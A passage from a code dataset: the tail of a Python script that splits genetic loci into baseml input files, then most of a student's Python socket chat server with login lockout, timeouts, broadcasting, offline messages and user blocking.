inFile.readline()\n print(\"Found site pattern section:\", line)\n outDir = \"locus_{}\".format(locus)\n if not os.path.isdir(outDir):\n os.makedirs(outDir)\n outFileName = \"{}/tmp000{}.txt\".format(outDir, locus)\n print(\"Writing to new file:\", outFileName)\n outFile = open(outFileName, \"w\")\n line = inFile.readline()\n line = inFile.readline()\n while not \"Frequencies\" in line:\n outFile.write(line)\n line = inFile.readline()\n outFile.close()\n print(\"Found frequencies line, done:\", line)\n outFile = open(\"{}/tmp000{}.ctl\".format(outDir, locus), \"w\")\n templateCtl = open(\"tmp0001.ctl\", \"r\")\n for templateLine in templateCtl:\n if \"tmp0001\" in templateLine:\n templateLine = templateLine.replace(\"tmp0001\", \"tmp000{}\".format(locus))\n outFile.write(templateLine)\n outFile.close()\n templateCtl.close()\n print(\"Copying tree...\")\n shutil.copy(\"tmp0001.trees\", \"{}/tmp000{}.trees\".format(outDir, locus))\n outFile = open(\"{}/baseml_{}.sh\".format(outDir, locus), \"w\")\n outFile.write(basemlString.format(locus))\n outFile.close()\n subprocess.call([\"chmod\",\"u+x\",\"{}/baseml_{}.sh\".format(outDir, locus)])\n\ninFile.close()\n\nprint(locusList)\n\nquit()\n\n\n\n","sub_path":"hessian_splitter.py","file_name":"hessian_splitter.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"273070693","text":"'''\nUsed the sample code as the base from \nhttps://pythonprogramming.net/server-chatroom-sockets-tutorial-python-3/\nCoding: utf-8\nEditted by: z5147986\nUsage: \n(easy) - python3 server.py\n(default) - pyhton3 server.py \n'''\nfrom socket import *\nfrom select import *\nfrom utility import authenticate, user_exists_On9clients, user_exists_Off9clients, user_exists, user_blocked\nimport sys\nimport datetime \n\n# for easy testing uncomment this\nserver_host = 'localhost'\nserver_port = 12000\nblock_duration = 60\ntimeout = 120\n\n# FIXME before submitting\n# for easy testing comment this\n# server_host = 'localhost'\n# server_port = int(sys.argv[1])\n# block_duration = int(sys.argv[2])\n# timeout = int(sys.argv[3])\n\n# Create a socket\n# socket.AF_INET - address family, server_hostv4, some otehr possible are AF_INET6, AF_BLUETOOTH, AF_UNIX\n# socket.SOCK_STREAM - TCP, conection-based, socket.SOCK_DGRAM - UDP, connectionless, datagrams, socket.SOCK_RAW - raw server_host packets\nserver_socket = socket(AF_INET, SOCK_STREAM)\n\n# SO_ - socket option\n# SOL_ - socket option level\n# Sets REUSEADDR (as a socket option) to 1 on socket\n# ensures that socket resuse is setup BEFORE it is bound. Will avoid the TIME_WAIT issue\nserver_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n\n# Bind, so server informs operating system that it's going to use given server_host and server_port\n# For a server using 0.0.0.0 means to listen on all available interfaces, useful to connect locally to 127.0.0.1 and remotely to LAN interface server_host\nserver_socket.bind((server_host, server_port))\n\n# This makes server listen to new connections\nserver_socket.listen()\n\n# List of sockets for select()\nsockets_list = [server_socket]\n\n# List of connected clients - socket as a key, user header and credentials as data\nonline_clients = {}\n\n# list of blocked clients\nblocked_clients = {}\n\n# list of offline clients\noffline_clients = {}\n\n# list of offline messages\noffline_messages = {}\n\nprint(f'Listening for connections on {server_host}:{server_port}')\n\n# Handles message receiving\ndef receive_message(client_socket):\n try:\n # Receive header containing message length, it's size is defined as 20\n message_header = client_socket.recv(20)\n\n # If we received no data, client gracefully closed a connection, for example using socket.close() or socket.shutdown(socket.SHUT_RDWR)\n if not len(message_header):\n return False\n\n # Convert header to int value\n message_length = int(message_header.decode())\n\n # Return a dict object of message header and message data\n return {'header': message_header, 'data': client_socket.recv(message_length)}\n\n except:\n # If we are here, client closed connection violently, for example by pressing ctrl+c on his script\n # or just lost his connection\n # socket.close() also invokes socket.shutdown(socket.SHUT_RDWR) what sends information about closing the socket (shutdown read/write)\n # and that's also a cause when we receive an empty message\n return False\n\nwhile (1):\n # Calls Unix select() system call or Windows select() WinSock call with three parameters:\n # - rlist - sockets to be monitored for incoming data\n # - wlist - sockets for data to be send to (checks if for example buffers are not full and socket is ready to send some data)\n # - xlist - sockets to be monitored for exceptions (we want to monitor all sockets for errors, so we can use rlist)\n # Returns lists:\n # - reading - sockets we received some data on (that way we don't have to check sockets manually)\n # - writing - sockets ready for data to be send thru them\n # - errors - sockets with some exceptions\n # This is a blocking call, code execution will \"wait\" here and \"get\" notified in case any action should be taken\n read_sockets, _, exception_sockets = select(sockets_list, [], sockets_list)\n\n # --- timeout start ---\n for timeout_socket in list(online_clients):\n current_time = datetime.datetime.now()\n if 'last-active' in online_clients[timeout_socket]:\n minus_timeout = current_time - datetime.timedelta(seconds=timeout)\n if minus_timeout == online_clients[timeout_socket]['last-active'] or minus_timeout > online_clients[timeout_socket]['last-active']:\n print('Connection timeout for: {} since {}'.format(online_clients[timeout_socket]['data'].decode().split(',')[0], (online_clients[timeout_socket]['last-active'] + datetime.timedelta(seconds=timeout)).strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]))\n user = 'WICKWICK\\'S SERVER'.encode()\n user_header = f\"{len(user):<{20}}\".encode()\n message = 'Connection Timeout at {} due to inactivity. Bye {}!'.format((online_clients[timeout_socket]['last-active'] + datetime.timedelta(seconds=timeout)).strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3], online_clients[timeout_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n timeout_socket.send(user_header + user + message_header + message)\n\n # add to logged out list\n offline_clients[timeout_socket] = online_clients[timeout_socket]\n\n # Remove from list for socket.socket()\n sockets_list.remove(timeout_socket)\n\n # Remove from our list of users\n del online_clients[timeout_socket]\n\n # send indication of termination to client\n # timeout_socket.shutdown(SHUT_RDWR)\n timeout_socket.close()\n # --- timeout end ---\n\n # Iterate over notified sockets\n for notified_socket in read_sockets:\n\n # If notified socket is a server socket - new connection, accept it\n if notified_socket == server_socket and notified_socket not in online_clients:\n\n # Accept new connection\n client_socket, client_address = server_socket.accept()\n\n # to track retry count\n retry_count = 0\n\n # Client send message\n while(1):\n # FIXME if have time implement this extra feature\n # --- accept timeout start ---\n # 60 second to login else close connection, others waiting\n # current_time = datetime.datetime.now()\n \n # if current_time > (accepted_time + datetime.timedelta(seconds=60)):\n # print(f'Connection timeout for: {client_address}')\n # message = 'Connection Timeout, login faster!'.encode()\n # message_header = f\"{len(message):<{20}}\".encode()\n # timeout_socket.send(message_header + message)\n # break\n # --- accept timeout end ---\n\n user = receive_message(client_socket)\n # If False client disconnected before sending credentials\n if user is False:\n continue\n\n # print(user['data'].decode()) # \"username,password\"\n credentials = user['data'].decode().split(',')\n # print(credentials[0]) # username\n # print(credentials[1]) # password \n \n # --- block_duration start ---\n check = None\n # check blocked account\n for blocked in blocked_clients:\n if blocked_clients[blocked]['data'].decode() == credentials[0]:\n username = blocked_clients[blocked]['data'].decode() #.split(',')[0]\n # check block duration by doing current time - block duration\n current_time = datetime.datetime.now()\n minus_blocked = current_time - datetime.timedelta(seconds=block_duration)\n if minus_blocked > blocked_clients[blocked]['account-blocked'] or minus_blocked == blocked_clients[blocked]['account-blocked']:\n print(f'UNBLOCKED: {username}\\'s account!')\n if username == credentials[0]:\n message = 'Your account have been UNBLOCKED since {}, {}!'.format(current_time.strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3], username).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n del blocked_clients[blocked]\n break\n elif minus_blocked < blocked_clients[blocked]['account-blocked']:\n check = username\n if username == credentials[0]:\n print(f'BLOCKED: {username} is still blocked!')\n message = 'Your account is blocked {}. Please try again after {}!'.format(username, (blocked_clients[blocked]['account-blocked'] + datetime.timedelta(seconds=block_duration)).strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n client_socket.shutdown(SHUT_RDWR)\n client_socket.close()\n break\n continue\n # if user tries to login after block with new client_socket\n if check == credentials[0]:\n break\n # --- block_duration end ---\n\n # --- Check duplicate login start ---\n if user_exists_On9clients(username=credentials[0], on9clients=online_clients):\n print(f'AUTHENTICATION :{credentials[0]} is already online. FAILED!')\n message = f'SERVER: {credentials[0]} is already online!'.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n break\n # --- Check duplicate login end ---\n\n # --- Authentication start ---\n result = authenticate(credential=credentials)\n\n print(f'AUTHENTICATION for {credentials[0]}: {result}')\n if 'Successful' in result:\n\n # Add accepted socket to select() list\n sockets_list.append(client_socket)\n\n user['logged-in'] = datetime.datetime.now()\n\n # to check user inactivity - timeout\n user['last-active'] = user['logged-in']\n\n # user will have user_header and credentials\n online_clients[client_socket] = user\n\n username = user['data'].decode().split(',')[0]\n print('Accepted new connection from {}:{}, username: {}'.format(*client_address, username))\n \n # print('client socket is {}:{}'.format(client_socket.getsockname()[0], client_socket.getsockname()[1]))\n # print('client socket is {}'.format(client_address)) \n # store for p2p\n user['private-connection'] = client_address\n # user['private-connection'] = (client_socket.getsockname()[0], client_socket.getsockname()[1])\n\n message = '--------------------------'.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n\n message = '---- offline messages ----'.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n\n message = '--------------------------'.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n\n # update logged out clients list and send all offline message(s)\n for offline_socket in offline_clients:\n if offline_clients[offline_socket]['data'].decode().split(',')[0] == credentials[0]:\n if offline_socket in offline_messages:\n for msg in offline_messages[offline_socket]:\n # print(offline_messages[msg])\n if credentials[0] == msg['recipient'].decode().split(',')[0]:\n message = '{} > {}'.format(msg['sender'].decode().split(',')[0], msg['message'].decode()).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n del offline_messages[offline_socket]\n del offline_clients[offline_socket]\n break\n\n message = '--------------------------'.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n\n # send login date time\n message = 'Welcome back {}! You logged in at: {}'.format(username, user['logged-in'].strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n\n for online_socket in online_clients:\n blocked = False\n # But don't sent it to sender\n if client_socket != online_socket:\n # check if user in my block list\n if 'blocked-user' in online_clients[client_socket]:\n for i in range(len(online_clients[client_socket]['blocked-user'])):\n if online_clients[online_socket]['data'] == online_clients[client_socket]['blocked-user'][i]['data']:\n exist = True\n blocked = True\n break\n # check if me in user block list\n if 'blocked-user' in online_clients[online_socket]:\n for i in range(len(online_clients[online_socket]['blocked-user'])):\n if online_clients[client_socket]['data'] == online_clients[online_socket]['blocked-user'][i]['data']:\n exist = True\n blocked = True\n break\n if blocked == False:\n message = '{} logged in at {}'.format(user['data'].decode().split(',')[0], user['logged-in'].strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(user['header'] + user['data'] + message_header + message)\n break\n else:\n if 'Password' in result:\n retry_count += 1\n user['retry'] = retry_count\n # if fail 3rd retry, block user\n if user['retry'] >= 3:\n print(f'BLOCKED: {credentials[0]}\\'s account. Retry count :{retry_count}')\n user['account-blocked'] = datetime.datetime.now()\n message = 'Invalid Password. Retry count limit reached. Please try again later after {}. {}, Your account has been blocked!'.format((user['account-blocked'] + datetime.timedelta(seconds=block_duration)).strftime(\"%H:%M:%S.%f\")[:-3], credentials[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n \n # user will have username, user_header and block duration\n user['data'] = credentials[0].encode()\n\n # add user to block account list\n blocked_clients[client_socket] = user\n\n break\n # Invalid password, prompt sender try again\n else:\n result = result + ' retry count: {}'.format(user['retry'])\n message = result.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n else:\n message = result.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n # --- Authentication end ---\n\n # Else existing socket is sending a message\n # After authentication successful, server start to send user and message (both with their headers)\n # server will reuse message header sent by sender for certain commands like message, broadcasting, etc\n elif notified_socket in online_clients and notified_socket not in blocked_clients:\n # else:\n \n # Receive message\n message = receive_message(notified_socket)\n\n # If False, client disconnected, cleanup\n if message is False:\n print('Closed connection from: {}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]))\n\n # add to offline user list\n if notified_socket not in offline_clients:\n offline_clients[notified_socket] = online_clients[notified_socket]\n\n # Remove from list for socket.socket()\n sockets_list.remove(notified_socket)\n\n # Remove from our list of online users\n del online_clients[notified_socket]\n\n continue\n\n # Get user by notified socket, so we will know who sent the message\n user = online_clients[notified_socket]\n\n if user is False:\n continue\n\n user['last-active'] = datetime.datetime.now()\n\n print('Received message at {} from {}: {}'.format(user['last-active'].strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3], user[\"data\"].decode().split(',')[0], message[\"data\"].decode()))\n\n # --- Commands start ---\n command = message[\"data\"].decode().split(' ')[0]\n # --- broadcast start ---\n if command == 'broadcast':\n check = message['data'].decode().split(' ')\n if len(check) >= 2:\n message['data'] = message['data'].decode().split(' ', 1)[1].encode()\n # Iterate over online user and broadcast message\n exist = False\n for client_socket in online_clients:\n blocked = False\n # But don't sent it to sender\n if client_socket != notified_socket:\n # check if user in my block list\n if 'blocked-user' in online_clients[notified_socket]:\n for i in range(len(online_clients[notified_socket]['blocked-user'])):\n if online_clients[client_socket]['data'] == online_clients[notified_socket]['blocked-user'][i]['data']:\n exist = True\n blocked = True\n break\n # check if me in user block list\n if 'blocked-user' in online_clients[client_socket]:\n for i in range(len(online_clients[client_socket]['blocked-user'])):\n if online_clients[notified_socket]['data'] == online_clients[client_socket]['blocked-user'][i]['data']:\n exist = True\n blocked = True\n break\n if blocked == False:\n client_socket.send(user['header'] + user['data'] + message['header'] + message['data'])\n if exist:\n print('{} some user will not get the broadcast!'.format(user['data'].decode().split(',')[0]))\n message = 'some user will not get the broadcast, {}!'.format(user['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n break\n else:\n print('FAIL: No message to broadcast, {}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]))\n message = 'No message to broadcast, {}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- broadcast end ---\n\n # --- whoelse start ---\n elif command == 'whoelse':\n check = message['data'].decode().split(' ')\n if len(check) == 1:\n # checks online user list\n for client_socket in online_clients:\n if client_socket != notified_socket and client_socket not in blocked_clients:\n message = '{} is online!'.format(online_clients[client_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n print('FAIL: whoelse need no args, {}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]))\n message = 'whoelse need no args, {}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- whoelse end ---\n\n # --- whoelsesince start ---\n elif command == 'whoelsesince':\n check = message['data'].decode().split(' ')\n if len(check) == 2:\n # checks online user list\n for client_socket in online_clients:\n current_time = datetime.datetime.now()\n sec = message['data'].decode()\n sec = int(sec.split(' ')[1])\n t = online_clients[client_socket]['logged-in'] + datetime.timedelta(seconds=sec)\n # if not self and user is not blocked and user is not offline\n if client_socket != notified_socket and client_socket not in blocked_clients and client_socket not in offline_clients:\n # if user's logged in time + more than or equals to current time diplay user\n if t > current_time or t == current_time: \n msg = '{} IS online, last active: {}!'.format(online_clients[client_socket]['data'].decode().split(',')[0], online_clients[client_socket]['last-active'].strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(msg):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + msg)\n # checks offline user list\n for client_socket in offline_clients:\n current_time = datetime.datetime.now()\n sec = message['data'].decode()\n sec = int(sec.split(' ')[1])\n t = offline_clients[client_socket]['logged-in'] + datetime.timedelta(seconds=sec)\n # if not self and user is not blocked and user is not online\n if client_socket != notified_socket and client_socket not in blocked_clients and client_socket not in online_clients:\n # if user's logged in time + more than or equals to current time diplay user\n if t > current_time or t == current_time:\n msg = '{} WAS online, last active: {}!'.format(offline_clients[client_socket]['data'].decode().split(',')[0], offline_clients[client_socket]['last-active'].strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(msg):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + msg)\n else:\n print('FAIL: Insufficient Args or Too Many Args, {}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]))\n message = 'Error, Insufficient Args or Too Many Args, {}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- whoelsesince end ---\n\n # --- message start ---\n elif command == 'message':\n check = message['data'].decode().split(' ')\n if len(check) < 3:\n print('FAIL: Insufficient Args, {}!'.format(online_clients[notified_socket]['data'].decode().split(',')[0]))\n message = 'Error, Insufficient Args, {}!'.format(online_clients[notified_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n # if self fail\n if check[1] == user['data'].decode().split(',')[0]:\n print('FAIL: {} can\\'t MESSAGE SELF!'.format(check[1]))\n message = 'Error, can\\'t MESSAGE SELF: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n recipient = message['data'].decode().split(' ')[1]\n msg = message['data'].decode().split(' ', 2)[2]\n\n if user_exists(username=recipient, on9clients=online_clients, off9clients=offline_clients):\n # check if recipient is online\n for client_socket in online_clients:\n if client_socket != notified_socket and online_clients[client_socket]['data'].decode().split(',')[0] == recipient:\n # if send successful sender will NOT get notified\n if user_blocked(my_socket=notified_socket, on9clients=online_clients, off9clients=offline_clients):\n message = 'Error, can\\'t send message to: {}! *{} blocked you...'.format(recipient, recipient).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n print('on9 MESSAGE sent to {} from {}'.format(recipient, user['data'].decode().split(',')[0]))\n msg = msg.strip().encode()\n message_header = f\"{len(msg):<{20}}\".encode()\n client_socket.send(user['header'] + user['data'] + message_header + msg)\n # check if recipient is offline\n for client_socket in offline_clients:\n if client_socket != notified_socket and offline_clients[client_socket]['data'].decode().split(',')[0] == recipient:\n # if send successful sender will get notified\n if not user_blocked(my_socket=notified_socket, on9clients=online_clients, off9clients=offline_clients):\n msg = msg.strip().encode()\n # message_header = f\"{len(msg):<{20}}\".encode()\n # client_socket.send(user['header'] + user['data'] + message_header + msg)\n if client_socket in offline_messages:\n offline_messages[client_socket].append({'sender_header': user['header'], 'sender': user['data'], 'recipient': offline_clients[client_socket]['data'], 'message':msg })\n else:\n offline_messages[client_socket] = [{'sender_header': user['header'], 'sender': user['data'], 'recipient': offline_clients[client_socket]['data'], 'message':msg }]\n print('off9 MESSAGE sent to {} from {}'.format(recipient, user['data'].decode().split(',')[0]))\n message = 'sent message to: {} successful!'.format(recipient).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n print(f'off9 MESSAGE FAIL: can\\'t send to {recipient}')\n message = 'Error, can\\'t send offline message to: {}! *{} blocked you...'.format(recipient, recipient).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # if user in credentials.txt but never log in\n # if user not in credentials.txt\n else:\n print('FAIL: {} doesn\\'t exist!'.format(check[1]))\n message = 'Error, {} doesn\\'t exist!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- message end ---\n\n # --- block start ---\n elif command == 'block':\n check = message['data'].decode().split(' ')\n if len(check) == 2:\n # if self fail\n if check[1] == user['data'].decode().split(',')[0]:\n print('{} can\\'t BLOCK SELF!'.format(check[1]))\n message = 'can\\'t BLOCK SELF: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # checks if user exist\n elif user_exists(username=check[1], on9clients=online_clients, off9clients=offline_clients):\n # checks my block list if user is online\n for client_socket in online_clients:\n if client_socket != notified_socket and online_clients[client_socket]['data'].decode().split(',')[0] == check[1]:\n if 'blocked-user' not in online_clients[notified_socket]:\n online_clients[notified_socket]['blocked-user'] = [online_clients[client_socket]]\n else:\n # check if user in my block list\n exist = False\n for i in range(len(online_clients[notified_socket]['blocked-user'])):\n if check[1] == online_clients[notified_socket]['blocked-user'][i]['data'].decode().split(',')[0]:\n print('{} already BLOCKED USER: {}!'.format(user['data'].decode().split(',')[0], check[1]))\n message = 'already BLOCKED USER: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n exist = True\n break\n if exist:\n break\n\n online_clients[notified_socket]['blocked-user'].append(online_clients[client_socket])\n \n print('{} BLOCKED USER: {}!'.format(user['data'].decode().split(',')[0], online_clients[client_socket]['data'].decode().split(',')[0]))\n message = 'BLOCKED USER: {}!'.format(online_clients[client_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n break\n # checks my block list if user is offline\n for client_socket in offline_clients:\n if client_socket != notified_socket and offline_clients[client_socket]['data'].decode().split(',')[0] == check[1]:\n if 'blocked-user' not in online_clients[notified_socket]:\n online_clients[notified_socket]['blocked-user'] = [offline_clients[client_socket]]\n else:\n exist = False\n for i in range(len(online_clients[notified_socket]['blocked-user'])):\n if check[1] == online_clients[notified_socket]['blocked-user'][i]['data'].decode().split(',')[0]:\n print('{} already BLOCKED USER: {}!'.format(user['data'].decode().split(',')[0], check[1]))\n message = 'already BLOCKED USER: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n exist = True\n break\n if exist:\n break\n online_clients[notified_socket]['blocked-user'].append(offline_clients[client_socket])\n print('{} BLOCKED USER: {}!'.format(user['data'].decode().split(',')[0], offline_clients[client_socket]['data'].decode().split(',')[0]))\n message = 'BLOCKED USER: {}!'.format(offline_clients[client_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n break\n # if user in credentials.txt but never log in\n # if user not in credentials.txt\n else:\n print('FAIL: {} doesn\\'t exist!'.format(check[1]))\n message = 'Error, {} doesn\\'t exist!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n print('FAIL: Insufficient Args: {}!'.format(user['data'].decode().split(',')[0]))\n message = 'Error, Insufficient Args: {}!'.format(user['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- block end ---\n\n # --- unblock start ---\n elif command == 'unblock':\n check = message['data'].decode().split(' ')\n if len(check) == 2:\n # if self fail\n if check[1] == user['data'].decode().split(',')[0]:\n print('{} can\\'t UNBLOCK SELF!'.format(check[1]))\n message = 'can\\'t UNBLOCK SELF: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n break\n\n # checks my blocked user list\n for client_socket in online_clients:\n if 'blocked-user' in online_clients[notified_socket]:\n # blocked-user is an array of dicts\n for i in range(len(online_clients[notified_socket]['blocked-user'])):\n if check[1] == online_clients[notified_socket]['blocked-user'][i]['data'].decode().split(',')[0]:\n print('{} UNBLOCKED USER: {}!'.format(user['data'].decode().split(',')[0], check[1]))\n message = 'UNBLOCKED USER: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n del online_clients[notified_socket]['blocked-user'][i]\n break\n else:\n print('FAIL: to unblock: {}!'.format(check[1]))\n message = 'Error, fail to unblock {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n break\n else:\n print('FAIL: Insufficient Args or Too Many Args: {}!'.format(user['data'].decode().split(',')[0]))\n message = 'Error, Insufficient Args or Too Many Args: {}!'.format(user['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- unblock end ---\n\n # --- logout start ---\n elif command == 'logout':\n check = message['data'].decode().split(' ')\n if len(check) == 1:\n current_time = datetime.datetime.now()\n user['last-active'] = current_time\n\n print('Connection close for: {} at {}'.format(user['data'].decode().split(',')[0], current_time.strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]))\n message = 'Logged out at {} Bye!'.format(current_time.strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n\n # broadcast log out message\n for client_socket in online_clients:\n blocked = False\n # But don't sent it to sender\n if client_socket != notified_socket:\n # check if user in my block list\n if 'blocked-user' in online_clients[notified_socket]:\n for i in range(len(online_clients[notified_socket]['blocked-user'])):\n if online_clients[client_socket]['data'] == online_clients[notified_socket]['blocked-user'][i]['data']:\n exist = True\n blocked = True\n break\n # check if me in user block list\n if 'blocked-user' in online_clients[client_socket]:\n for i in range(len(online_clients[client_socket]['blocked-user'])):\n if online_clients[notified_socket]['data'] == online_clients[client_socket]['blocked-user'][i]['data']:\n exist = True\n blocked = True\n break\n if blocked == False:\n message = '{} logged out at {}'.format(user['data'].decode().split(',')[0], user['last-active'].strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(user['header'] + user['data'] + message_header + message)\n\n # add to logged out list\n offline_clients[notified_socket] = online_clients[notified_socket]\n\n # Remove from list for socket.socket()\n sockets_list.remove(notified_socket)\n\n # Remove from our list of users\n del online_clients[notified_socket]\n\n # send indication of termination to client\n notified_socket.shutdown(SHUT_RDWR)\n notified_socket.close()\n else:\n print('FAIL: Too many Args: {}!'.format(user['data'].decode().split(',')[0]))\n message = 'Error, Too many Args: {}!'.format(user['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- logout end ---\n\n # FIXME --- P2P commands start---\n elif command == 'startprivate':\n check = message['data'].decode().split(' ')\n if len(check) == 2:\n if check[1] == user['data'].decode().split(',')[0]:\n print('{} can\\'t startprivate SELF!'.format(check[1]))\n message = 'can\\'t startprivate SELF: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n break\n # check if user is online and not offline\n if user_exists(username=check[1], on9clients=online_clients, off9clients=offline_clients):\n if user_exists_On9clients(username=check[1], on9clients=online_clients) and not user_exists_Off9clients(username=check[1], off9clients=offline_clients):\n for client_socket in online_clients:\n if online_clients[client_socket]['data'].decode().split(',')[0] == user['data'].decode().split(',')[0]:\n continue\n if online_clients[client_socket]['data'].decode().split(',')[0] == check[1]:\n print('TO CONNECT {}:{}'.format(*online_clients[client_socket]['private-connection']))\n print('notified_socket: {}:{}'.format(*online_clients[notified_socket]['private-connection']))\n # notified_socket.connect(online_clients[client_socket]['private-connection'])\n # new_user = user['data'].decode().split(',')[0].encode()\n # new_user_header = f\"{len(new_user):<{20}}\".encode()\n # message = f'{client_socket}'\n message = \"Connecting {} {}\".format(online_clients[client_socket]['private-connection'][0], online_clients[client_socket]['private-connection'][1]).encode()\n # message = \"{} {} Please accept my connection from {} : {}\".format(client_socket, online_clients[client_socket]['data'].decode().split(',')[0], online_clients[notified_socket]['private-connection'][0], online_clients[notified_socket]['private-connection'][1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # client_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n print('FAIL: {} not online!'.format(check[1]))\n message = 'Error, {} not online!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # if user in credentials.txt but never log in\n # if user not in credentials.txt\n else:\n print('FAIL: {} doesn\\'t exist!'.format(check[1]))\n message = 'Error, {} doesn\\'t exist!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n print('FAIL: Insufficient Args or Too Many Args: {}!'.format(user['data'].decode().split(',')[0]))\n message = 'Error, Insufficient Args or Too Many Args: {}!'.format(user['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n\n # --- P2p commands end ---\n\n # --- default ---\n else:\n print('FAIL: Invalid Command, {}!'.format(user['data'].decode().split(',')[0]))\n 